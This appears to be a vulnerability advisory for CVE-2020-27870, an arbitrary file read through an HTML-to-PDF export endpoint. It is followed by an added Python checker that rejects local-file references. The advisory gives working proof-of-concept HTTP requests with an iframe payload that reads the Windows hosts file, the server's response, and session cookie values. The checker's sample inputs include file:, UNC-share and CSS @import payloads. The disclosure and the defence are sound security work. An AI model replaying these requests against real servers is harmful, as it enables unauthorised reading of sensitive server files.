**CVE-2020-27870: Directory Traversal leading to arbitrary file read**

The endpoint `/orion/ExportToPDF.aspx` converts HTML to PDF, but it does not check whether the submitted HTML references local files. Furthermore, the guest user account can access this endpoint. By submitting HTML that references a local file, an attacker with guest-level access can read arbitrary files on the server in the context of SYSTEM, since the converter follows the reference while rendering the page. For example, the following request retrieves the contents of `C:\Windows\system32\drivers\etc\hosts`; the `PageHTML` parameter decodes to `<html><iframe src="C:\Windows\system32\drivers\etc\hosts" width="1000" height="1000"></html>`:

```
POST /orion/ExportToPDF.aspx?ExportID=55475&PageHTML=%3Chtml%3E%3Ciframe%20src=%22C:%5CWindows%5Csystem32%5Cdrivers%5Cetc%5Chosts%22%20width=%221000%22%20height=%221000%22%3E%3C/html%3E HTTP/1.1
Host: 172.16.11.168:8787
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Origin: http://172.16.11.168:8787
X-Requested-With: XMLHttpRequest
Referer: http://172.16.11.168:8787/Orion/SummaryView.aspx?ViewID=1
Content-Type: application/x-www-form-urlencoded
Cookie: .ASPXAUTH=0660567401DF21BAAC59[...]
Content-Length: 53

[...Truncated...]
```

The resulting PDF, which contains the disclosed file contents, is then retrieved with a second request to the same `ExportID`, this time with the `gimmethefile=true` parameter:

```
POST /orion/ExportToPDF.aspx?ExportID=55475&gimmethefile=true HTTP/1.1
Host: 172.16.11.168:8787
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Origin: http://172.16.11.168:8787
X-Requested-With: XMLHttpRequest
Referer: http://172.16.11.168:8787/Orion/SummaryView.aspx?ViewID=1
Content-Type: application/x-www-form-urlencoded
Cookie: .ASPXAUTH=0660567401DF21BAAC590375C511332186FE319751464EE2932BBBCECF1EECFDEB7AA7233D83572D3B253C5ADE83A083BD5CF9E0B7699DFEDB363A1442CCF2EBE56CA101813AEF9FF9A1579E73A430AC3244F36FD16490759B5B68A4E8A3F5A81E11FC7C5089CDD107A332701E673486A9683E74BB72A823C438FB681E3821F71F74C58A4D2E10146E19B04D5D491E3799E0973FBF1A8ED1723E97FE52E40D29D926C3A0B88074EE68B1ECE4391CD320; ASP.NET_SessionId=4q4kij1u0b3p3w5fcztorv5e; XSRF-TOKEN=6/SttzXoY2rJFY+74my5pSS055DftLCVbuOBlNKBxEU=; __AntiXsrfToken=e2de2272ca1e4cb7854602e9a0ca8d03
Content-Length: 53

__AntiXsrfTokenInput=e2de2272ca1e4cb7854602e9a0ca8d03
```

```
HTTP/1.1 200 OK
Cache-Control: private
Transfer-Encoding: chunked
Content-Type: binary/octet-stream
Content-Disposition: attachment; filename="OrionReport.PDF"; size=32215
X-Same-Domain: 1
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Date: Wed, 07 Oct 2020 18:24:56 GMT

7dd7
%PDF-1.4
%....
1 0 obj
<<
/Creator (EO.Pdf)
/Producer (EO.Pdf 19.2.11.0)
/CreationDate (D:20201007182359+00'00')
/ModDate (D:20201007182359+00'00')
>>
endobj
[...Truncated...]
```
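The root cause above is an HTML-to-PDF renderer that fetches whatever the submitted markup points at, with the privileges of the converting process. The following is an added example, not SolarWinds code and not part of the original advisory, of the input check the endpoint is described as lacking: it walks the HTML and rejects every fetchable reference that is not an absolute http(s) URL or an inline `data:` URI, which covers the advisory's `<iframe src="C:\...">` payload as well as the other places a renderer follows references from (`img`, `link`, `object`, `srcset`, CSS `url()` and `@import`), and it percent-decodes first so `C%3A%5C...` is not missed. The function names, the sample inputs other than the advisory's own iframe, and the hostnames in them are constructed for this example. Treat it as defense in depth: the renderer itself should also run with local resource loading disabled and the endpoint should not be reachable by guest accounts, because an allow-list of schemes still permits outbound http(s) fetches from the server (an SSRF concern this check does not address).

```python
"""Added example: the local-file check the ExportToPDF endpoint lacks.

Reports every fetch target in submitted HTML that is not an absolute http(s)
URL or an inline data: URI, so drive-letter paths, file: URLs, UNC paths and
relative paths are rejected before a renderer sees them. Names and sample
inputs are constructed for the example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Attributes whose value a renderer fetches while laying out the page.
FETCH_ATTRS = {"src", "href", "data", "poster", "xlink:href"}
# url(...) and @import in style attributes and <style> blocks trigger fetches too.
CSS_REF_RE = re.compile(r"""url\(\s*['"]?([^'")\s]+)['"]?\s*\)|@import\s+['"]([^'"]+)['"]""", re.I)
DRIVE_RE = re.compile(r"^[a-z]:[\\/]", re.I)  # C:\... or D:/...

# The advisory's PageHTML parameter, URL-decoded.
ADVISORY_IFRAME = ('<html><iframe src="C:\\Windows\\system32\\drivers\\etc\\hosts" '
                   'width="1000" height="1000"></html>')


def is_unsafe_reference(ref: str) -> bool:
    """True unless ``ref`` is an absolute http(s) URL or an inline data: URI.

    Percent-decoding comes first so ``C%3A%5CWindows`` is treated like ``C:\\Windows``;
    tabs, newlines and surrounding spaces are dropped because URL parsers ignore them.
    """
    ref = re.sub(r"[\t\r\n]", "", unquote(ref)).strip()
    if not ref:
        return False
    if DRIVE_RE.match(ref) or ref.startswith("\\\\"):
        return True  # local drive or UNC share (an SMB fetch made as SYSTEM)
    try:
        parts = urlsplit(ref)
    except ValueError:
        return True  # unparseable: refuse rather than guess
    scheme = parts.scheme.lower()
    if scheme == "data":
        return False  # inline content, nothing is fetched
    # No scheme (relative path), file:, res:, ftp: ... reach the local box or an
    # unexpected protocol handler; only http(s) with an explicit host is allowed.
    return not (scheme in ("http", "https") and parts.netloc)


class _RefCollector(HTMLParser):
    """Collect (tag, attribute, reference) for everything a renderer would fetch."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.refs: list[tuple[str, str, str]] = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self._in_style = True
        for name, value in attrs:
            if value is None:
                continue
            if name in FETCH_ATTRS:
                self.refs.append((tag, name, value))
            elif name == "srcset":  # "a.png 1x, b.png 2x": the URL is the first token
                for candidate in value.split(","):
                    tokens = candidate.split()
                    if tokens:
                        self.refs.append((tag, name, tokens[0]))
            elif name == "style":
                self._collect_css(tag, value)

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:
            self._collect_css("style", data)

    def _collect_css(self, tag, css):
        for m in CSS_REF_RE.finditer(css):
            self.refs.append((tag, "css", m.group(1) or m.group(2)))


def find_local_file_references(html: str) -> list[tuple[str, str, str]]:
    """Return every fetch target in ``html`` that is not remote; reject the export if non-empty."""
    collector = _RefCollector()
    collector.feed(html)
    collector.close()
    return [(t, a, r) for t, a, r in collector.refs if is_unsafe_reference(r)]


if __name__ == "__main__":
    # Constructed samples: the advisory's payload, other vectors a renderer
    # follows, and one benign document that must pass.
    samples = {
        "advisory iframe": ADVISORY_IFRAME,
        "percent-encoded file: URL": '<img src="file%3A///C%3A/Windows/win.ini">',
        "UNC share": '<link rel="stylesheet" href="\\\\10.0.0.5\\share\\x.css">',
        "CSS @import": '<style>@import "../../web.config";</style>',
        "benign": '<p style="background:url(https://cdn.example.test/a.png)">'
                  '<img src="data:image/png;base64,iVBORw0KGgo="></p>',
    }
    for label, html in samples.items():
        hits = find_local_file_references(html)
        print(f"{label:26} -> {'BLOCK ' + repr(hits) if hits else 'allow'}")
```

Running the module prints one line per constructed sample; the advisory's iframe, the percent-encoded `file:` URL, the UNC share and the CSS `@import` are all reported, while the benign document with a remote image and a `data:` URI passes. The check is deliberately allow-list based (anything not clearly remote is refused), because a deny-list of `file:` and drive letters misses relative paths and protocol handlers.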